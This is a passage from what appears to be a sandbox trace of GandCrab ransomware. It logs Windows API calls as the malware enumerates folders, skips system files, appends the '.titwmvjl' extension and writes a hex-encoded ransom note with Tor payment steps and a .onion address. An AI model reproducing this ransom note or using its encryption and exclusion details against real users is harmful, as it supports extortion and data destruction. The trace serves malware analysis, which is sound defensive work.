36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0067.612] WriteFile (in: hFile=0x218, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259fa30, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259fa30*=0x2162, lpOverlapped=0x0) returned 1 [0067.613] CloseHandle (hObject=0x218) returned 1 [0067.614] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.614] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.614] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xc, wMilliseconds=0x3a2)) [0067.614] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.614] GetWindowsDirectoryW (in: lpBuffer=0x2610000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0067.614] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2610200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2610600, lpMaximumComponentLength=0x2610608, lpFileSystemFlags=0x2610604, lpFileSystemNameBuffer=0x2610400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2610600*=0xd2ca4def, lpMaximumComponentLength=0x2610608*=0xff, lpFileSystemFlags=0x2610604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0067.729] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Recovery\\d2ca4a09d2ca4deb61a.lock") returned 36 [0067.729] CreateFileW (lpFileName="C:\\Recovery\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\recovery\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x220 [0067.734] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.735] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.735] lstrlenW (lpString="C:\\Recovery\\") returned 12 [0067.735] lstrcatW (in: lpString1="C:\\Recovery\\", lpString2="*" | out: lpString1="C:\\Recovery\\*") returned="C:\\Recovery\\*" [0067.735] FindFirstFileExW (in: lpFileName="C:\\Recovery\\*", fInfoLevelId=0x1, lpFindFileData=0x259fa4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259fa4c) returned 0x4c9e78 [0067.735] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.735] FindNextFileW (in: hFindFile=0x4c9e78, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.736] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.736] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.736] FindNextFileW (in: hFindFile=0x4c9e78, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.736] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0067.736] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0067.736] lstrcatW (in: lpString1="C:\\Recovery\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Recovery\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Recovery\\d2ca4a09d2ca4deb61a.lock" [0067.736] lstrlenW (lpString=".titwmvjl") returned 9 [0067.736] lstrlenW (lpString="C:\\Recovery\\d2ca4a09d2ca4deb61a.lock") returned 36 [0067.736] VirtualAlloc (lpAddress=0x0, dwSize=0x88, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.736] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Recovery\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 45 [0067.736] lstrlenW (lpString="C:\\Recovery\\d2ca4a09d2ca4deb61a.lock") returned 36 [0067.736] lstrlenW (lpString=".lock") returned 5 [0067.736] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.737] wsprintfW (in: param_1=0x2610000, param_2="%ws " | out: param_1=".lock ") returned 6 [0067.737] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.737] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.737] FindNextFileW (in: hFindFile=0x4c9e78, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.737] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0067.737] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0067.737] lstrcatW (in: lpString1="C:\\Recovery\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Recovery\\TITWMVJL-DECRYPT.txt") returned="C:\\Recovery\\TITWMVJL-DECRYPT.txt" [0067.737] lstrlenW (lpString=".titwmvjl") returned 9 [0067.737] lstrlenW (lpString="C:\\Recovery\\TITWMVJL-DECRYPT.txt") returned 32 [0067.737] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.737] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Recovery\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 41 [0067.738] lstrlenW (lpString="C:\\Recovery\\TITWMVJL-DECRYPT.txt") returned 32 [0067.738] lstrlenW (lpString=".txt") returned 4 [0067.738] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.738] wsprintfW (in: param_1=0x2610000, param_2="%ws " | out: param_1=".txt ") returned 5 [0067.738] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0067.738] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.738] lstrlenW (lpString="C:\\Recovery\\TITWMVJL-DECRYPT.txt") returned 32 [0067.738] lstrlenW (lpString="C:\\Recovery\\TITWMVJL-DECRYPT.txt") returned 32 [0067.738] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0067.738] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0067.738] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0067.738] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0067.738] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0067.738] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0067.738] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0067.738] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0067.738] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.739] FindNextFileW (in: hFindFile=0x4c9e78, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.739] lstrcmpW (lpString1="WindowsRE", lpString2=".") returned 1 [0067.739] lstrcmpW (lpString1="WindowsRE", lpString2="..") returned 1 [0067.739] lstrcatW (in: lpString1="C:\\Recovery\\", lpString2="WindowsRE" | out: lpString1="C:\\Recovery\\WindowsRE") returned="C:\\Recovery\\WindowsRE" [0067.739] lstrcatW (in: lpString1="C:\\Recovery\\WindowsRE", lpString2="\\" | out: lpString1="C:\\Recovery\\WindowsRE\\") returned="C:\\Recovery\\WindowsRE\\" [0067.739] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0067.739] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.739] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0067.739] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.740] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0067.740] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.740] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0067.740] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.740] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0067.740] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.740] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.740] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Recovery\\WindowsRE\\\\TITWMVJL-DECRYPT.txt") returned 43 [0067.741] CreateFileW (lpFileName="C:\\Recovery\\WindowsRE\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\recovery\\windowsre\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0067.741] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\